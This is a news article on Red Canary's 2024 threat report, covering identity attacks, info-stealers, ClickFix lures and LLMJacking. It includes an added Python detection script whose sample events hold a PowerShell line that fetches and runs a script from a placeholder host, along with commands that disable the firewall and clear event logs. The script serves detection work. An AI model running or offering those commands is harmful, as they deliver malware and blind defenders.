An analysis of 93,000 threats published this week by Red Canary, a provider of a managed detection and response (MDR) service, finds the number of cyberattacks seeking to compromise an identity increased by a factor of four in 2024.
Keith McCammon, chief security officer at Red Canary, said the most common result of those breaches was the installation of some type of info-stealer software used to exfiltrate sensitive data.
The most commonly used info-stealer is LummaC2, which cybercriminals can gain access to for anywhere from $250 per month to a one-time payment of $20,000. A larger percentage of those attacks are being aimed at macOS platforms, with Red Canary seeing a 400% increase in detections in 2024. On the plus side, 95% of those incidents occurred prior to Apple remediating a Gatekeeper bypass technique last September, compared to only 5% that occurred throughout the rest of the year, the report noted.
In general, the sharp increase in attacks aimed at, for example, cloud accounts or email systems, makes it clear that cybercriminals are shifting tactics and techniques to gain access to centralized systems through which they can steal data or distribute malware, he added.
More troubling still, none of the threats detected by Red Canary in 2024 in 308 PB of telemetry data were thwarted by the security controls organizations had in place.
Surprisingly, one of the tactics increasingly being employed to gain initial access is paste and run, also known as “ClickFix” and “fakeCAPTCHA”, which tricks end users into executing malicious JavaScript code under the pretense that it will fix some issue on their system.
Additionally, cybercriminals are targeting weaknesses in virtual private networks (VPNs) and remote monitoring and management (RMM) platforms, and posing as helpful IT administrators who need to remotely install software on a corporate system. Cybercriminals are also becoming more adept at disabling or modifying firewall rules and logging, the report noted.
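The two behaviours just described, paste-and-run initial access and tampering with firewall rules or logging, are the kind of thing an MDR provider detects from endpoint process telemetry. The following is an added example (not Red Canary's code and not from the report) that runs a few heuristic rules over constructed process-creation events: a shell launched from the Windows Run dialog (parent explorer.exe) that fetches remote content is flagged as paste-and-run, and well-known firewall, event log and audit-policy commands are flagged as defense evasion. The event format, field names and sample command lines are assumptions for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed shape, not a real EDR schema)."""
    parent: str
    image: str
    cmdline: str


# Paste-and-run heuristic: the Run dialog and Explorer spawn the pasted command
# directly, so the parent is explorer.exe rather than a browser or an installer.
PASTE_AND_RUN_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Pasted one-liners almost always pull a second stage from the network.
REMOTE_FETCH = re.compile(
    r"(iwr\b|invoke-webrequest|\birm\b|invoke-restmethod|\bcurl\b|downloadstring|mshta\s+https?://)",
    re.I,
)

# Defense-evasion heuristics: commands that turn off the firewall, open it up,
# or wipe the logs defenders rely on.
TAMPER_PATTERNS = [
    (re.compile(r"netsh\s+advfirewall\s+set\b.*\bstate\s+off", re.I), "firewall disabled"),
    (re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I), "firewall rule added"),
    (re.compile(r"\bwevtutil\s+(cl|clear-log)\b", re.I), "event log cleared"),
    (re.compile(r"\bauditpol\b.*/clear", re.I), "audit policy cleared"),
    (re.compile(r"set-mppreference\b.*-disable", re.I), "defender setting disabled"),
]


def classify(event: ProcessEvent) -> list[str]:
    """Return the list of findings for one event; empty list means benign."""
    findings: list[str] = []
    if (
        event.parent.lower() in PASTE_AND_RUN_PARENTS
        and event.image.lower() in SHELL_IMAGES
        and REMOTE_FETCH.search(event.cmdline)
    ):
        findings.append("paste-and-run: shell launched from Run dialog fetching remote content")
    for pattern, label in TAMPER_PATTERNS:
        if pattern.search(event.cmdline):
            findings.append(f"defense evasion: {label}")
    return findings


def scan(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that triggered a rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}


# Constructed sample telemetry (not real data); example.invalid is a reserved TLD.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/fix | iex"'),
    ProcessEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ProcessEvent("cmd.exe", "netsh.exe", "netsh advfirewall set allprofiles state off"),
    ProcessEvent("powershell.exe", "wevtutil.exe", "wevtutil cl Security"),
    ProcessEvent("services.exe", "powershell.exe", "powershell -c Get-Date"),
    ProcessEvent("explorer.exe", "powershell.exe", r'powershell -c "Get-ChildItem C:\temp"'),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline)
        for finding in findings:
            print("   ", finding)
```

The parent-process condition is what keeps the paste-and-run rule from firing on ordinary scripted PowerShell (event 4, spawned by a service) or on an administrator running a local command from the Run dialog (event 5, no network fetch); in production the same logic would sit over the EDR's process-creation stream rather than a hard-coded list.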
Finally, as usage of large language models (LLMs) increased, Red Canary began to see cybercriminals selling access to instances of artificial intelligence models they had gained access to, a practice otherwise known as LLMJacking.
The one thing that is clear is that most successful cyberattacks are not especially complex. In fact, many of them can be prevented simply by implementing and maintaining a set of best practices, such as restricting VPN access to a specific sanctioned platform or regularly installing patches to applications.
There is, of course, no doubt that the tactics and techniques being employed by cybercriminals will continue to evolve as they leverage artificial intelligence to create more sophisticated social engineering attacks to compromise identities. However, they are also counting on simple inertia that enables them to successfully launch cyberattacks using comparatively trivial techniques that don’t cost nearly as much to develop. After all, why go to the trouble of breaking into a locked window on the upper floor of a building when they already have a key to the front door?
The challenge, as always, is making sure the keys don’t go missing in the first place and, assuming they are, regularly changing the lock on the door.